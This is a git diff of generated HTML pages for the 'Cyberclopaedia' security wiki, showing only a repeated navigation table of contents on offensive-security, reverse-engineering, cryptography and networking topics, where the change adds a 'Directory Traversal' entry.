          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Public-Key Cryptography/index.html b/docs/Cryptography/Public-Key Cryptography/index.html index 395b77fb..fc160503 100644 --- a/docs/Cryptography/Public-Key Cryptography/index.html +++ b/docs/Cryptography/Public-Key Cryptography/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -207,22 +207,6 @@

P - - diff --git a/docs/Cryptography/index.html b/docs/Cryptography/index.html index 5e93317a..bf3ad47d 100644 --- a/docs/Cryptography/index.html +++ b/docs/Cryptography/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
